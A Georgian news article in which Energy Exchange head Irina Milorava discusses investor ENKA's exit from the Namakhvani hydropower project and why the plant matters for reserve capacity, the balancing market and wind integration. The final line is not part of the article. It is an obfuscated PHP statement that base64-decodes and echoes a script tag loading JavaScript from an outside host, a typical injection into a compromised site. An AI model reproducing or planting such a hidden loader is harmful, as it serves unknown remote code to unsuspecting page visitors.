celsiusi
ავერსი საქკაბელი

"ჩვენ თუ გვინდა, ვიყოთ დამოუკიდებელი ენერგეტიკულად, ზუსტად ამ ტიპის ობიექტები უნდა აშენდეს", – ამის შესახებ ენერგეტიკული ბირჟის გენერალურმა დირექტორმა ირინა მილორავამ Forbes Talk-თან ინტერვიუში, "ნამახვანჰესის" ირგვლივ განვითარებული მოვლენების შეფასებისას განაცხადა.

კითხვაზე - გააკეთა თუ არა ყველაფერი ქართულმა მხარემ იმისთვის, რომ ინვესტორ კომპანია ENKA-ს საქართველოს მთავრობასთან ხელშეკრულების შეწყვეტის შესახებ პროცედურები არ დაეწყო, ირინა მილორავა ასე პასუხობს – "ე.ი არ გავაკეთეთ საკმარისი".

"მე არ ვიცი ეს პროცესები სიღრმისეულად და ძალიან არ მიყვარს ისეთ საკითხებზე კომენტარების გაკეთება, რაც არ ვიცი, მაგრამ თავისთავად ფაქტი, რომ ინვესტორი გადის ქვეყნიდან, ჩემთვის კითხვაზე პასუხი არის მარტივი - ე.ი. არ გავაკეთეთ საკმარისი, რადგან მივიღეთ ის მოცემულობა, რაც მივიღეთ, რომ პროექტის ინვესტორი გადის ქვეყნიდან.

როდესაც მეკითხებოდნენ, რა უნდა გაგვეკეთებინა, აუცილებელია, მეტი და მეტი ვისაუბროთ გენერაციის ობიექტების მნიშვნელობაზე ამ ქვეყნისთვის, რადგან ეს არ არის მარტო კომერციული პროექტი, ეს არის ამ ქვეყნის ენერგეტიკული დამოუკიდებლობისკენ გადადგმული ნაბიჯი. თუ ჩვენ გვინდა ვიყოთ დამოუკიდებელი ენერგეტიკულად, ზუსტად ამ ტიპის ობიექტები უნდა აშენდეს", – განაცხადა ირინა მილორავამ და აქვე განმარტა, რა დატვირთვა აქვს "ნამახვანჰესს" ელექტროენერგეტიკის ახალი ბაზრისთვის.

"რატომ იყო ეს პროექტი საინტერესო, ზოგადად, და ასევე, ახალი ბაზრისთვის? – იმიტომ რომ ეს იყო ე.წ. მარეგულირებელი სადგური, რომელსაც შეეძლო ძალიან აქტიური მონაწილეობა მიეღო სიმძლავრის ბაზარზე. ამ ბაზრის ახალ მოდელში, სიმძლავრის ბაზარი ერთ–ერთი ყველაზე მნიშვნელოვანია და როდესაც სწორ გენერაციაზე ვსაუბრობ, ზუსტად ამას ვგულისხმობ, ეს არის სადგური, რომელსაც შეეძლება ივაჭროს სიმძლავრის ბაზარზე.

დარწმუნებული ვარ, მიუხედავად ამ სირთულისა, ეს სადგური აუცილებლად აშენდება და უნდა აშენდეს. ეს არის სადგური რომელმაც სიმძლავრის ბაზარზე ძალიან მნიშვნელოვანი როლი უნდა ითამაშოს. ჩვენ არ უნდა დაგვავიწყდეს კიდევ ერთი მოცემულობა, რაც სახეზე გვაქვს, ეს არის "ენგურჰესის" ხელმისაწვდომობა. 2015 წლიდან ოკუპირებული აფხაზეთის მოხმარება ძალიან სერიოზულად არის გაზრდილი, თბილისის მოხმარებასაც გადააჭარბა. ეს იმას ნიშნავს, რომ "ენგურჰესის" ელექტროენერგია სულ უფრო და უფრო ნაკლები რჩება დანარჩენი საქართველოსთვის – ანუ, "ენგურჰესი", როგორც იაფი რესურსი და სარეზერვო სიმძლავრის მიმწოდებელი სადგური. რას ვგულისხმობ ამ შემთხვევაში? – ჩვენ ცენტრალური დისპეჩერების მოდელიდან თვითდისპეჩერების მოდელზე გადავდივართ და ასევე ვქმნით საბალანსო ბაზარს, სადაც იყიდება სარეზერვო სიმძლავრეები, როდესაც გადამცემი სისტემის ოპერატორმა რეალურ დროში უნდა მართოს ბაზარი – ანუ თუ მოხმარება გაიზარდა, ამას უნდა ჰქონდეს სადღაც დარეზერვებული სიმძლავრე და მისი მოთხოვნისთანავე ეს სიმძლავრე უნდა მიეწოდოს სისტემას. აი, აქ "ენგურჰესის" მონაწილეობა თუ შეგვიმცირდება, ძალიან ცოტა გვაქვს სინამდვილეში სარეზერვო სიმძლავრეები, თბოსადგურებს თუ არ ჩავთვლით, რომლებიც ყველა მახასიათებელს არ აკმაყოფლებენ. ამიტომ გვჭირდება სარეზერვო სიმძლავრეები და ასეთი უნდა ყოფილიყო "ნამახვანჰესი", – განმარტა ენერგეტიკული ბირჟის ხელმძღვანელმა.

გარდა ამისა, ირინა მილორავა "ნამახვანჰესის", როგორც განახლებადი ენერგიების წყაროების სხვა პროექტების ხელშეწყობის როლზეც საუბრობს.

"კიდევ ერთი მნიშვნელოვანი დატვირთვა, რაც უნდა ჰქონოდა ასეთი ტიპის სადგურს, ეს არის განახლებადი ენერგიის წყაროების ქსელში ინტეგრაცია; როდესაც ვსაუბრობთ ქარის ენერგიაზე, რომელიც სუფთა ენერგიაა და გვინდა, რომ ჩვენს ქსელში იყოს ინტეგრირებული, უნდა ვიცოდეთ, რომ როდესაც ქარის არ არის, სადგური ჩერდება და წარმოვიდგინოთ, რომ 200 მეგავატი სიმძლავრე მყისიერად აკლდება სისტემას. ასეთ დროს შეიძლება ორი შედეგი დადგეს – ან გამორთავ 200 მეგავატიან მომხმარებელს ან სადღაც დარეზერვებულ 200 მეგავატს ჩართავ იმისთვის, რომ რეალურ დროში დარეზერვება მოახდინო. ამიტომ ამ სადგურს ძალიან სერიოზული დატვირთვა აქვს ბევრი მიმართულებით. ჩემი შეფასება არცერთ შემთხვევაში არ გამორიცხავს იმას, რომ ყველა პროექტი ამ ქვეყანაში უნდა აშენდეს გამჭვირვალედ და იგივე, გარემოსდაცვითი კანონმდებლობის მაქსიმალურად დაცვით, რამდენადაც ეს არის კაპიტალტევადი, გრძელვადიანი პროექტები", – აღნიშნა ირინა მილორავამ.

"ნამახვანჰესის" ინვესტორთან მოლაპარაკებების პროცესზე რამდენიმე დღის წინ ეკონომიკის მინისტრმა გააკეთა განცხადება და აღნიშნა, რომ მთავრობის ამოცანაა, ENKA-სთან შეთანხმება მოხდეს ამა თუ იმ ფორმით, არბიტრაჟის გარეშე.

შეგახსენებთ: კომპანია ENKA-მ სექტემბერში საფონდო ბირჟაზე ფორს-მაჟორისა და კონტრაქტის პირობების დარღვევის გამო, სახელმწიფოსთან საინვესტიციო ხელშეკრულების გაწყვეტის შესახებ გააკეთა განცხადება. გავრცელებული ინფორმაციით, კომპანია ამჟამად საერთაშორისო საარბიტრაჟო დავის დასაწყებადაც ემზადება.

ENKA-ს მიერ პროექტიდან გასვლის შესახებ გაკეთებულ განცხადებამდე რამდენიმე თვით ადრე, პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა აღნიშნა, რომ პროექტი არსებული სახით არ განხორციელდებოდა. ამასთანავე, მთავრობის გადაწყვეტილებით, ENKA-მ ჰესის მშენებლობა შეაჩერა, რადგანაც მასზე მორატორიუმი გამოცხადდა.

წყარო: BMG

1178
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");